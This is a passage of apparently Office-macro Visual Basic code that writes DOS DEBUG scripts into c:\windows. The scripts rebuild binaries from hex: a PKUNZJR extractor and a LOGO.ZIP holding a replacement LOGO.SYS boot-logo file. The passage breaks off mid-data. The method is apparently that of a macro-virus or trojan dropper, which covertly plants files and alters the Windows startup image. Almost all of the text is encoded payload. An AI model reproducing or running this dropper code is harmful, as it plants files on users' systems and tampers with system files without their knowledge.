Print #2, "E 0910 03 FA 03 FA FD AC 84 C0 74 1E 3C 08 77 22 91 B8"
Print #2, "E 0920 01 00 41 D3 E0 8B 1D D1 E3 56 8B 36 D8 AE 89 10"
Print #2, "E 0930 03 D8 80 FF 02 72 F7 5E 4F 4F 4A 79 D8 FC 5A C3"
Print #2, "E 0940 2C 08 8A C8 8B 05 8A D8 32 FF D1 E3 03 1E D8 AE"
Print #2, "E 0950 B5 01 56 52 83 3F 00 75 18 8B 16 D6 A9 8B F2 D1"
Print #2, "E 0960 EA F7 D2 89 17 83 06 D6 A9 04 33 D2 89 12 89 52"
Print #2, "E 0970 02 8B 1F F7 D3 D1 E3 03 DD 84 E5 74 02 43 43 D0"
Print #2, "E 0980 E5 FE C9 75 CF 5A 89 17 EB AD 51 52 8B CF BA 00"
Print #2, "E 0990 0E 8B FA 2B CA 89 0E DC AE E8 03 00 5A 59 C3 53"
Print #2, "E 09A0 52 E8 DC F9 5A 8B 1E D0 AE B4 40 CD 21 5B 3B C1"
Print #2, "E 09B0 75 01 C3 B4 3E CD 21 BA 2C AA B4 41 CD 21 BA B1"
Print #2, "E 09C0 0B B0 06 E9 76 F7 0D 0A 50 4B 55 4E 5A 4A 52 28"
Print #2, "E 09D0 54 4D 29 20 20 46 41 53 54 21 20 20 4D 69 6E 69"
Print #2, "E 09E0 20 45 78 74 72 61 63 74 20 55 74 69 6C 69 74 79"
Print #2, "E 09F0 20 20 56 65 72 73 69 6F 6E 20 32 2E 30 34 67 20"
Print #2, "E 0A00 20 30 32 2D 30 31 2D 39 33 0D 0A 43 6F 70 72 2E"
Print #2, "E 0A10 20 31 39 38 39 2D 31 39 39 33 20 50 4B 57 41 52"
Print #2, "E 0A20 45 20 49 6E 63 2E 20 41 6C 6C 20 52 69 67 68 74"
Print #2, "E 0A30 73 20 52 65 73 65 72 76 65 64 2E 0D 0A 00 50 4B"
Print #2, "E 0A40 55 4E 5A 4A 52 3A 20 00 0D 0A 00 53 65 61 72 63"
Print #2, "E 0A50 68 69 6E 67 20 5A 49 50 3A 20 00 57 61 72 6E 69"
Print #2, "E 0A60 6E 67 21 20 00 00 50 4B 00 00 45 72 72 6F 72 20"
Print #2, "E 0A70 69 6E 20 5A 49 50 20 2D 20 55 73 65 20 50 4B 5A"
Print #2, "E 0A80 69 70 46 69 78 00 44 6F 20 79 6F 75 20 77 61 6E"
Print #2, "E 0A90 74 20 74 6F 20 65 78 74 72 61 63 74 20 74 68 65"
Print #2, "E 0AA0 73 65 20 66 69 6C 65 73 20 6E 6F 77 20 28 79 2F"
Print #2, "E 0AB0 6E 29 3F 20 00 54 6F 6F 20 6D 61 6E 79 20 66 69"
Print #2, "E 0AC0 6C 65 73 00 43 61 6E 27 74 20 4F 70 65 6E 3A 20"
Print #2, "E 0AD0 00 55 73 61 67 65 3A 20 20 70 6B 75 6E 7A 6A 72"
Print #2, "E 0AE0 20 5B 2D 6F 5D 20 66 69 6C 65 6E 61 6D 65 5B 2E"
Print #2, "E 0AF0 7A 69 70 5D 20 5B 6F 75 74 70 75 74 5F 70 61 74"
Print #2, "E 0B00 68 5D 0D 0A 00 55 6E 6B 6E 6F 77 6E 20 63 6F 6D"
Print #2, "E 0B10 70 72 65 73 73 69 6F 6E 20 6D 65 74 68 6F 64 20"
Print #2, "E 0B20 66 6F 72 3A 20 00 20 61 6C 72 65 61 64 79 20 65"
Print #2, "E 0B30 78 69 73 74 73 21 20 4F 76 65 72 77 72 69 74 65"
Print #2, "E 0B40 3F 20 00 43 61 6E 27 74 20 63 72 65 61 74 65 3A"
Print #2, "E 0B50 20 00 66 69 6C 65 20 66 61 69 6C 73 20 43 52 43"
Print #2, "E 0B60 20 63 68 65 63 6B 00 45 78 74 72 61 63 74 69 6E"
Print #2, "E 0B70 67 3A 20 00 20 49 6E 66 6C 61 74 69 6E 67 3A 20"
Print #2, "E 0B80 00 46 69 6C 65 20 68 61 73 20 61 20 62 61 64 20"
Print #2, "E 0B90 74 61 62 6C 65 00 10 11 12 00 08 07 09 06 0A 05"
Print #2, "E 0BA0 0B 04 0C 03 0D 02 0E 01 0F 01 03 07 0F 1F 3F 7F"
Print #2, "E 0BB0 FF 64 69 73 6B 20 66 75 6C 6C 00 00 01 00"
Print #2, "RCX"
Print #2, "0ABE"
Print #2, "W"
Print #2, "Q"
Close #2
End Sub

Sub LogoZip()
Open "c:\windows\logo.dbg" For Output As #3
Print #3, "N LOGO.ZIP"
Print #3, "E 0100 50 4B 03 04 14 00 00 00 08 00 38 51 9B 28 17 D3"
Print #3, "E 0110 09 49 36 12 00 00 36 F8 01 00 08 00 00 00 6C 6F"
Print #3, "E 0120 67 6F 2E 53 59 53 ED 9D 39 8F 2B C7 15 46 6B 04"
Print #3, "E 0130 07 8E E4 3F 20 28 36 6C 28 15 60 40 81 E1 44 81"
Print #3, "E 0140 E0 50 89 52 45 0A 9D 39 B3 33 67 86 23 47 4A 9D"
Print #3, "E 0150 28 76 A0 DC 86 42 07 86 9D 71 E9 66 73 99 85 FB"
Print #3, "E 0160 BE CC 0C 7D 6F 55 F5 CA 2E D7 13 6E BF 9E 9E E1"
Print #3, "E 0170 77 04 E1 91 C5 4B 72 FA 9B EA 66 73 58 F7 F0 37"
Print #3, "E 0180 BF FD 74 7F A3 98 4F 7F A2 D4 CF E9 DF 5F D3 D5"
Print #3, "E 0190 BF D0 FF 37 EA A7 7A 5C AD 6F D4 BF 3E 54 EA 9F"
Print #3, "E 01A0 1F 9A AB 2D F3 8F 3A D3 7F EA 7C 56 00 80 F7 CD"
Print #3, "E 01B0 59 FD 4C CD D5 C7 2A 54 9F A8 7F AB CF D4 3F D4"
Print #3, "E 01C0 17 EA EF EA 2B F5 37 F5 8D FA AB FA BD FA 13 FD"
Print #3, "E 01D0 F7 7B BA F4 0D 8D 7C 45 B7 7C 41 15 9F 51 E5 27"
Print #3, "E 01E0 74 8F 8F E9 9E 3F E3 BD 55 2D 68 1F 8E 3E 52 EA"
Print #3, "E 01F0 BF BF 50 EA 87 5F 29 F5 FD E7 4A 7D F7 A5 52 DF"
Print #3, "E 0200 7E AD D4 9F 7F A7 D4 1F FF A0 D4 EF FE AC D4 D7"
Print #3, "E 0210 DF 2A F5 E5 77 4A 7D FE BD 52 BF FA 41 A9 5F FE"
Print #3, "E 0220 47 A9 8F 22 A5 3E 5C E8 1F 45 3D 4C 66 8B D5 66"
Print #3, "E 0230 77 38 3D 9D DB DD A0 D7 1F DE DE 8F A7 3C B4 DD"
Print #3, "E 0240 1F 69 AC D5 09 C2 A8 3F 1C DD DD 3F 4C 68 78 B9"
Print #3, "E 0250 5A 6F B6 BB C3 F1 78 7A 7C 7A 3E B7 5A ED 4E A7"
Print #3, "E 0260 DB 0D 82 30 EC F5 7A 51 16 BA 1E 86 41 D0 ED 76"
Print #3, "E 0270 3A ED 56 EB FC FC F4 78 3A 1E 0F BB ED 66 BD 5A"
Print #3, "E 0280 2E 66 D3 C9 C3 FD DD 68 D8 8F C2 A0 D3 3A 3F 9D"
Print #3, "E 0290 8E FB ED 66 45 C3 E3 FB DB 61 BF 17 74 DB 34 76"
Print #3, "E 02A0 D8 F1 D0 E4 E1 6E 34 88 C2 6E A7 F5 FC 48 55 EB"
Print #3, "E 02B0 E5 7C AA 87 A8 AA 43 55 34 B6 DB AC ED 23 DE 8E"
Print #3, "E 02C0 86 34 1E 06 5D 7A 4A 7E 46 7A CA C3 61 BF DF 6D"
Print #3, "E 02D0 B7 DB CD 66 CD AC 0C FA F2 66 43 E3 BB FD FE 70"
Print #3, "E 02E0 A0 8D D1 5B D3 EE 74 83 B0 D7 1F 0C 47 B7 76 6B"
Print #3, "E 02F0 D7 9B DD FE F8 48 C9 74 28 99 C1 E8 8E 46 E7 CB"
Print #3, "E 0300 35 25 F3 F8 DC EA 74 C3 48 0F E9 FC CC 90 CE 4F"
Print #3, "E 0310 0F 71 15 65 AA CB F8 AE 34 4A B1 CE F9 21 E9 49"
Print #3, "E 0320 0F 3A 3F 7E 4A 0E 30 B0 01 26 11 EA CB 1C 5F C0"
Print #3, "E 0330 F1 F1 C6 E8 FC 0E 7B CE 6F B9 98 53 50 0F 77 B7"
Print #3, "E 0340 1C 82 0E 86 B2 E2 64 74 58 3A 3F 13 56 2E 3F 93"
Print #3, "E 0350 A8 CE 8F 42 E6 A1 4C F2 CB F9 6C 62 1F 31 E2 FC"
Print #3, "E 0360 32 BF 31 8A 6F 67 E3 5B 65 B1 01 EE 38 C0 74 36"
Print #3, "E 0370 70 7E 91 DD DA C9 6C BE CC CD 22 1A A6 A9 C5 F9"
Print #3, "E 0380 D9 D9 A6 F3 B3 43 F9 48 79 88 E6 24 8D E9 49 19"
Print #3, "E 0390 0D 28 D5 FB 31 0D 9B 09 68 7E 67 F4 94 36 40 3D"
Print #3, "E 03A0 03 4D 82 31 61 32 FB 28 3E B3 31 34 17 CC F4 A3"
Print #3, "E 03B0 29 34 BE A7 A4 06 91 9E 6A 94 D5 81 27 91 9D 59"
Print #3, "E 03C0 F9 C9 66 67 64 27 33 23 F5 10 47 4A 55 3A D3 95"
Print #3, "E 03D0 7D 44 9E 7E 51 3A FD 4E 27 1B DF 86 E3 D3 A9 2D"
Print #3, "E 03E0 0D 36 41 1A B7 01 9E 4E E9 04 8C 78 02 DA AD 5D"
Print #3, "E 03F0 E9 AC 28 19 0E 4B EF 9A 99 BD B5 63 F7 56 DF F1"
Print #3, "E 0400 06 B8 E1 BD D5 5F 05 5C F0 DE EA AF 02 2E F8 98"
Print #3, "E 0410 E8 AF 02 2E F8 00 E8 AF 02 2E F8 CC CE 5F 05 5C"
Print #3, "E 0420 F0 E9 8A BF 0A B8 E0 33 3B 7F 15 70 C1 67 80 FE"
Print #3, "E 0430 2A E0 82 DF 9A F9 AB 80 0B 7E BF E6 AF 02 2E F8"
Print #3, "E 0440 5D 9D BF 0A B8 E0 B7 C0 FE 2A E0 82 FF B6 E2 AF"
Print #3, "E 0450 02 2E F8 0F 56 FE 2A E0 82 FF 38 EA AF 02 2E F8"
Print #3, "E 0460 6F 80 FE 2A E0 82 FF 2E ED AF 02 2E F8 EF D2 FE"
Print #3, "E 0470 2A E0 82 3F DD F0 57 01 17 FC 91 9B BF 0A B8 E0"
Print #3, "E 0480 8F DC FC 55 C0 05 7F 8A E9 AF 02 2E F8 53 4C 6F"
Print #3, "E 0490 11 70 C2 6B 0E BC 45 C0 09 7F B2 EE AF 02 2E 78"
Print #3, "E 04A0 19 87 BF 0A B8 E0 A5 31 FE 2A E0 82 17 0D F9 AB"
Print #3, "E 04B0 80 0B 5E 60 E5 AF 02 2E 78 1D 96 BF 0A B8 E0 15"
Print #3, "E 04C0 92 FE 2A E0 82 57 4D FA AB 80 0B 5E DC EB AF 02"
Print #3, "E 04D0 2E 78 21 AA BF 0A B8 E0 C5 BD FE 2A E0 82 97 8D"
Print #3, "E 04E0 FB AB 80 0B 5E 9D EF AF 02 2E 78 25 BE BF 0A B8"
Print #3, "E 04F0 E0 1E 0F 7F 15 70 C1 7D 33 FE 2A E0 82 9B B4 FC"
Print #3, "E 0500 55 C0 05 B7 22 F9 AB 80 0B 6E 1C F4 57 01 17 DC"
Print #3, "E 0510 38 E8 AF 02 2E B8 BF D0 5F 05 5C 70 2F A6 BF 0A"
Print #3, "E 0520 B8 E0 06 61 7F 15 70 C1 9D D3 FE 2A E0 82 DB CC"
Print #3, "E 0530 FD 55 C0 05 37 A3 FB AB 80 0B EE F0 F7 57 01 17"
Print #3, "E 0540 AC 8E F0 57 01 17 AC E8 F0 57 01 17 6C E3 F0 57"
Print #3, "E 0550 01 17 2C CA F1 57 01 17 2C CA F1 57 01 17 EC D8"
Print #3, "E 0560 F1 57 01 17 AC 23 F2 57 01 17 2C C9 F2 57 01 17"
Print #3, "E 0570 2C 0F F3 57 01 17 AC FA F3 57 01 17 AC FA F3 57"
Print #3, "E 0580 01 17 AC FA F3 57 01 17 6C 4F F4 57 01 17 2C 54"
Print #3, "E 0590 F4 57 01 17 EC 3A F5 57 01 17 6C 85 F5 57 01 17"
Print #3, "E 05A0 6C 94 F5 57 01 17 2C 3A F6 57 01 17 2C 2B F6 57"
Print #3, "E 05B0 01 17 2C 3A F6 57 01 17 F0 3F CB 80 FF 59 06 FC"
Print #3, "E 05C0 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03"
Print #3, "E 05D0 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96"
Print #3, "E 05E0 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F"
Print #3, "E 05F0 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8"
Print #3, "E 0600 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06"
Print #3, "E 0610 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C"
Print #3, "E 0620 A3 46 FF F3 0D E1 AF 7A 0F DC 24 F8 6B 7F 2C 35"
Print #3, "E 0630 FA 9F 2F 36 E0 83 12 1C F7 15 71 93 C1 5F FD E3"
Print #3, "E 0640 A8 D1 FF FC 62 F9 25 BC 87 00 AB F0 3F A7 3F 54"
Print #3, "E 0650 F6 C7 BB 48 E4 5D 67 41 5A 90 29 2D CF F8 E2 F1"
Print #3, "E 0660 D2 9B CB 7E 19 EF 25 3F B1 BF F8 5D B7 37 DE 54"
Print #3, "E 0670 5F 82 EF 9C DF 4D 86 4C 59 F1 D2 7B DD 81 2B F0"
Print #3, "E 0680 3F 97 6D 6F D9 76 94 E6 52 86 6B 73 0B 53 EA C7"
Print #3, "E 0690 3C EF 4D FC 6F F5 F9 89 FD C5 AF 21 BF E2 A5 CA"
Print #3, "E 06A0 A8 C0 FF 5C FD 76 98 DB 2F AA 9A 99 9F D8 5F 7C"
Print #3, "E 06B0 93 C3 8C BD 64 7E 1F 14 8A 93 5B 33 3F 5F 65 54"
Print #3, "E 06C0 E0 7F 2E CD E5 83 0C 99 BA 38 17 CF 66 DC DC DC"
Print #3, "E 06D0 94 54 15 F2 2B DB CF 3F C8 51 52 57 7D 7E 62 7F"
Print #3, "E 06E0 71 FA 53 E5 7E BE C2 46 E4 36 A3 F8 10 45 CA EB"
Print #3, "E 06F0 8A F9 95 D4 99 92 C2 13 27 BF BA F7 90 5F 05 FE"
Print #3, "E 0700 67 47 7E 22 4A 63 BE CC EF E5 A9 C0 FF 5C 4B 7E"
Print #3, "E 0710 17 B3 B9 21 54 E1 7F 4E 37 B4 BA DD A3 F8 AB 68"
Print #3, "E 0720 6E 7E F0 17 4B 80 FF 59 06 FC CF 32 E0 7F 96 01"
Print #3, "E 0730 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB"
Print #3, "E 0740 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F"
Print #3, "E 0750 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC"
Print #3, "E 0760 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03"
Print #3, "E 0770 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96"
Print #3, "E 0780 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F"
Print #3, "E 0790 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8"
Print #3, "E 07A0 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06"
Print #3, "E 07B0 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C"
Print #3, "E 07C0 03 FE 67 19 B5 FA 9F A7 93 87 FB BB DB D1 70 10"
Print #3, "E 07D0 F5 E2 27 3D EC B7 EB D5 62 36 1D DF DF E5 DE 47"
Print #3, "E 07E0 D2 58 EE 73 D5 5D D2 E5 D3 6F D4 EF BB 46 FF F3"
Print #3, "E 07F0 6C 3A 19 73 7E C3 41 3F EA 05 D6 BA 7A D8 6D D7"
Print #3, "E 0800 4B CA 6A 7C 7F 9B 7B 1F B4 9C 4F B3 9F 0B 1E 76"
Print #3, "E 0810 1B BB 4C 7B D8 EF 05 AA 39 D4 E8 7F 9E 4E 26 14"
Print #3, "E 0820 09 4F 3F 7A DB 1D 74 52 6D 23 65 75 F1 19 7E 21"
Print #3, "E 0830 BF FD 36 CE 6F 10 85 41 B1 F8 05 A9 D1 FF CC D3"
Print #3, "E 0840 8F F3 1B D0 09 67 D8 ED A4 DA C1 45 3E 2B 33 36"
Print #3, "E 0850 9B 64 3F 17 A4 BD DC 2E D3 A6 FC 9A 24 0C AE D1"
Print #3, "E 0860 FF 3C 19 73 7E 34 FD 28 BF A0 DB CE E4 37 9B F8"
Print #3, "E 0870 F2 DB 6D E2 FC FA C9 AE DF 08 6A F4 3F F3 D1 8F"
Print #3, "E 0880 F3 EB D3 09 27 ED BE A9 76 70 9E CF CA 8C D1 2B"
Print #3, "E 0890 4A E6 2A 1D FE 38 51 3A 78 52 7E 4D 12 06 D7 E8"
Print #3, "E 08A0 7F 1E 3F 70 7E FC EA 41 6F BB 3B AD 4C 7E D3 B1"
Print #3, "E 08B0 2F 3F 7E 91 36 97 68 F7 6D 52 7E 35 FA 9F F9 C5"
Print #3, "E 08C0 37 BE 4C BB 6F AA 1D 9C E5 B3 32 63 34 D9 32 57"
Print #3, "E 08D0 E9 F0 67 97 69 53 7E 4D 12 06 D7 E8 7F 7E B8 4F"
Print #3, "E 08E0 F3 A3 DD 37 93 DF E4 21 9B 1F 9F 11 9A FC D2 D7"
Print #3, "E 08F0 8A CD 2A CE AF 97 7D E5 7E 79 6A F4 3F F3 B9 5F"
Print #3, "E 0900 7C 99 76 5F A3 1D E4 60 A6 F6 C0 66 6F E3 D7 5A"
Print #3, "E 0910 DE 7D E9 95 3A 93 DF C2 2E D3 A6 FC EA 12 06 BF"
Print #3, "E 0920 0B 35 FA 9F EF EF D2 FC 68 F7 35 F9 25 6F 3E 06"
Print #3, "E 0930 49 7E 3B 9D 29 9F 50 67 5E 2B 96 49 97 4F A3 76"
Print #3, "E 0940 DF 3A FD CF 6F 92 1A FD CF 6F 92 2A FC CF D7 4C"
Print #3, "E 0950 05 FE E7 AB A6 02 FF F3 55 53 81 FF F9 AA A9 C0"
Print #3, "E 0960 FF 7C D5 54 E0 7F BE 6A 2A F0 3F 5F 35 15 F8 9F"
Print #3, "E 0970 AF 9A 0A FC CF 57 4D 05 FE E7 AB A6 0A FF F3 35"
Print #3, "E 0980 03 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F"
Print #3, "E 0990 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8"
Print #3, "E 09A0 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06"
Print #3, "E 09B0 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C"
Print #3, "E 09C0 03 FE 67 19 F0 3F CB 80 FF 59 46 15 FE E7 20 0C"
Print #3, "E 09D0 7B BD 28 8A FA 84 1D EA F7 23 D3 96 1D 04 DD B8"
Print #3, "E 09E0 5F E3 F1 74 BA F8 A8 B4 DF 0B B9 95 E1 F1 A4 FB"
Print #3, "E 09F0 08 33 37 D0 D8 71 9F 76 2D 68 9E A8 2A 73 95 7B"
Print #3, "E 0A00 C0 9E 69 8C 7B E3 E2 3A D3 DB 19 D4 D7 22 52 85"
Print #3, "E 0A10 FF 99 F2 33 01 52 84 76 88 2F F3 BF 21 C7 97 E4"
Print #3, "E 0A20 77 BC F8 A8 8F 1B 31 DB 67 CA 8A 1B 2C 33 F9 B5"
Print #3, "E 0A30 CF 3A 98 7C 7E 94 68 3E BF 24 F9 D5 C2 D6 E9 DE"
Print #3, "E 0A40 4E 6E 4E 6C D7 B4 AA BB 2A FF 33 05 98 ED CB 8D"
Print #3, "E 0A50 22 7D 55 CF BE B8 5F E3 74 2C C9 2F 2C ED C6 A2"
Print #3, "E 0A60 4C 4B 56 D5 F1 8C CC 5C CD F5 80 A5 F0 F4 53 ED"
Print #3, "E 0A70 D6 B9 9E 65 A1 55 F9 9F 79 06 66 AE F6 7A 71 7E"
Print #3, "E 0A80 14 5F 92 DF E1 E2 A3 BE 5E 59 37 96 AB C5 83 A7"
Print #3, "E 0A90 5A E6 6A 90 ED 01 4B D1 F9 29 CA AF 96 75 8D 55"
Print #3, "E 0AA0 F9 9F 79 1F CE 5C ED F5 F8 AA 99 7D F1 AE 74 3C"
Print #3, "E 0AB0 94 E4 17 5C B6 73 38 3B DC 28 BF EC DF 7A 73 3D"
Print #3, "E 0AC0 60 29 F6 E8 F7 FC F4 58 C7 C2 A8 AA FC CF 41 90"
Print #3, "E 0AD0 CB 2F E4 38 29 3E DA 93 DA AD 24 BF FD C5 47 7D"
Print #3, "E 0AE0 7C A8 3A 3F D1 8E 99 19 73 76 B8 D1 EE 9B CF CF"
Print #3, "E 0AF0 1E 38 F3 55 75 E7 57 8D BF B8 1B 04 41 E6 6A 18"
Print #3, "E 0B00 06 F6 95 97 E2 B3 7B D9 61 BF DF 6D D6 AB E5 62"
Print #3, "E 0B10 9E AA 0D 72 7D D4 16 67 87 1B BF 20 67 AE 26 3D"
Print #3, "E 0B20 60 79 28 3E BE 3B C5 57 C7 C2 A8 AA FC CF DD 6E"
Print #3, "E 0B30 2E BF 20 8E 4F 51 7C 49 7E BB 8B 8F FA 72 7D D4"
Print #3, "E 0B40 C9 20 9D 97 94 2D 8A A5 A9 96 CF AF F4 10 67 F2"
Print #3, "E 0B50 AB 69 FA 55 E6 7F EE F0 BE 9A C2 E9 99 13 17 8A"
Print #3, "E 0B60 CF 1E A5 F6 BB 92 FC CA 5F 43 F9 EC 2F 37 A0 E7"
Print #3, "E 0B70 9A 96 48 A4 CD 9A BC FB 96 DC 97 E2 6B D5 16 5F"
Print #3, "E 0B80 25 FE E7 56 BB DD EE 70 80 34 09 ED 50 37 8E 4F"
Print #3, "E 0B90 51 7C 49 7E 5B BD FB 6A 0F 87 ED 64 E5 3E EA A7"
Print #3, "E 0BA0 13 1F D8 B8 8F 30 7D 48 3E 55 DE AC 53 89 44 C7"
Print #3, "E 0BB0 9E 4F 9B 2E 74 33 66 0E 9C BA DB 30 11 00 E8 73"
Print #3, "E 0BC0 67 6E 4E 7C AA 69 55 77 15 FE E7 73 AB C5 01 EA"
Print #3, "E 0BD0 04 ED 10 A7 67 5E 44 29 3E BB 97 ED B6 FC 46 81"
Print #3, "E 0BE0 8E 7E 5A 03 63 EB D2 37 1F 05 E1 CB C1 B6 EC 9B"
Print #3, "E 0BF0 6B FA A5 22 6E 6C B5 F7 B5 6F 3E F8 E4 79 1A D7"
Print #3, "E 0C00 E9 73 E7 BA CE 5D 18 F8 9F 65 C0 FF 2C 03 FE 67"
Print #3, "E 0C10 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF"
Print #3, "E 0C20 B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80"
Print #3, "E 0C30 FF 59 06 FC CF 32 E0 7F 96 51 AB FF F9 0D 52 A3"
Print #3, "E 0C40 FF F9 4D 52 A3 FF F9 4D 52 A3 FF F9 4D 52 A3 FF"
Print #3, "E 0C50 F9 4D 52 A3 FF F9 4D 52 A3 FF F9 4D 52 A3 FF B9"
Print #3, "E 0C60 04 B3 76 CF 0A 64 A3 64 30 23 1B FF BF 77 6F 00"
Print #3, "E 0C70 35 FA 9F 5D 14 F4 ED E9 2A 17 F6 17 97 DE A3 41"
Print #3, "E 0C80 D4 E8 7F 76 91 7E FA 9D E7 36 9D 92 CD A5 46 FF"
Print #3, "E 0C90 B3 8B 32 7D BB 52 C5 2F 54 69 28 0D F0 3F F3 97"
Print #3, "E 0CA0 CF 5C 0C D2 E1 EF 55 7C 2E D8 00 FF F3 34 FF 55"
Print #3, "E 0CB0 01 4C E1 DB 3F 1A 4C 03 FC CF D3 71 31 BF 65 C9"
Print #3, "E 0CC0 17 D2 34 94 06 F8 9F F9 BB A3 B2 D7 37 49 37 C2"
Print #3, "E 0CD0 2B A0 01 FE E7 C9 43 2E 3F 3E FB 33 97 1A F6 55"
Print #3, "E 0CE0 33 A5 BC AC FF 59 AF DD A3 DD 77 34 E4 46 24 33"
Print #3, "E 0CF0 C6 8B FC F8 EC 79 D4 B0 6F 8A 2A 07 FE 67 19 F0"
Print #3, "E 0D00 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C"
Print #3, "E 0D10 F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59"
Print #3, "E 0D20 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF"
Print #3, "E 0D30 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0"
Print #3, "E 0D40 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19"
Print #3, "E 0D50 F0 3F CB A8 C8 FF 1C F5 FB 03 66 98 59 F3 C8 0E"
Print #3, "E 0D60 D9 28 B3 80 39 75 7A B1 04 CB 5C 1A F4 7B 97 4B"
Print #3, "E 0D70 74 79 E1 46 DB 68 B1 72 E7 A6 6C FB CB 5C 8D 72"
Print #3, "E 0D80 02 59 33 76 3B 1A DA 76 7A D6 38 A9 F7 4F 35 FE"
Print #3, "E 0D90 E7 5E 6A 8E 4D E0 F8 8C 86 D2 F2 F4 98 E4 B7 98"
Print #3, "E 0DA0 C7 F9 45 BD A0 78 C7 61 92 69 BA 94 48 F3 9C F7"
Print #3, "E 0DB0 2C 96 B9 2B 29 3F F3 83 D4 14 5F 35 FE E7 5E AF"
Print #3, "E 0DC0 77 B1 52 D9 18 8C 7B 61 AA 05 4C 8D 86 CB C5 DC"
Print #3, "E 0DD0 BA D6 FA 51 98 DC 1E 43 F9 D9 B1 42 7E 3C D5 32"
Print #3, "E 0DE0 57 CB 3C 8B 34 FD 74 7E 9D 4E 4D 02 DE AA FC CF"
Print #3, "E 0DF0 C5 B1 BE 15 18 B3 08 D0 0E A5 FE E7 E5 3C 76 D5"
Print #3, "E 0E00 A5 CB AE 52 06 49 A6 7E FF B3 2A C0 FE E7 44 41"
Print #3, "E 0E10 59 07 15 F8 9F BB 79 F5 A9 26 F6 3F 1B 93 9D B9"
Print #3, "E 0E20 94 FA 9F 53 83 67 CE FF 6C EF 9B AE 5B 7B 47 FF"
Print #3, "E 0E30 73 66 8C FD CF 5A AA AA 6A A2 02 FF 73 41 DD A9"
Print #3, "E 0E40 B1 FE 67 BE 35 EF 7F 66 85 A2 62 85 A2 AD 4B FC"
Print #3, "E 0E50 CF DB EC B2 49 9B 1F F7 D1 A4 8F 59 E6 7F 7E 2A"
Print #3, "E 0E60 64 3A E4 17 24 AD 50 7C 45 FE E7 82 3B 56 43 87"
Print #3, "E 0E70 44 3D 29 D3 F8 8C FF 99 F2 5B 2A DA 7D 13 5F 64"
Print #3, "E 0E80 EC 2A 66 83 A2 B9 94 2E 3B 2D E4 F7 0E FE 67 A3"
Print #3, "E 0E90 1F EF B2 B4 F6 B9 16 05 65 25 FE E7 B2 19 18 86"
Print #3, "E 0EA0 7C 14 CB C4 A7 FD CF C6 E0 39 9F 26 BE CD E4 35"
Print #3, "E 0EB0 74 93 EC AB A9 FF 99 75 93 99 87 7C 07 FF 33 E5"
Print #3, "E 0EC0 67 8F 25 AF CA FF 5C 1A A0 71 C8 A6 47 22 F6 3F"
Print #3, "E 0ED0 73 7E C6 E0 19 17 C5 05 E9 AA F1 D4 FF 9C E6 C7"
Print #3, "E 0EE0 4A 5E E3 7F 4E 5B 1B F8 C0 A9 0A F0 F4 33 97 5E"
Print #3, "E 0EF0 97 FF 99 03 64 05 79 F6 95 24 EB BE 67 8C FF D9"
Print #3, "E 0F00 BC 7A 8C E3 FC 92 53 E0 75 72 AA 92 9E 97 AC 12"
Print #3, "E 0F10 27 AA 7E A9 88 05 A8 F6 BE A9 7A 76 99 BC 1E F5"
Print #3, "E 0F20 F9 05 C9 18 50 EB F2 17 57 E3 7F BE 56 AA F2 3F"
Print #3, "E 0F30 5F 2B 55 F8 9F AF 99 2A FC CF D7 0C FC CF 32 E0"
Print #3, "E 0F40 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19"
Print #3, "E 0F50 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3"
Print #3, "E 0F60 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF"
Print #3, "E 0F70 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0"
Print #3, "E 0F80 FF 2C 03 FE 67 19 2F EB 7F 7E FD 34 C0 FF FC AA"
Print #3, "E 0F90 69 80 FF F9 55 D3 00 FF F3 AB A6 01 FE E7 57 4D"
Print #3, "E 0FA0 03 FC CF AF 9A 06 F8 9F 5F 35 F5 FB 9F 79 79 7C"
Print #3, "E 0FB0 E6 EA 62 16 AF 85 4E D7 83 B3 94 F7 9E BF BD 82"
Print #3, "E 0FC0 97 ED C6 AB C0 63 25 AF 6E 77 50 4D A1 7E FF 73"
Print #3, "E 0FD0 98 6F 6E 49 BF BD 82 97 F2 66 6E 18 0D 72 DF FE"
Print #3, "E 0FE0 31 4D 2C DB E7 A7 53 73 94 71 F5 FB 9F 0B CD 41"
Print #3, "E 0FF0 E9 7A E6 C2 7A 70 D7 B7 7F F0 7A E9 B2 F1 97 A1"
Print #3, "E 1000 7E FF 73 90 6F 4D 4B BF BD 82 DB 61 32 37 0C FB"
Print #3, "E 1010 65 F9 05 9D CB A6 85 97 A4 7E FF 73 B7 90 1F EB"
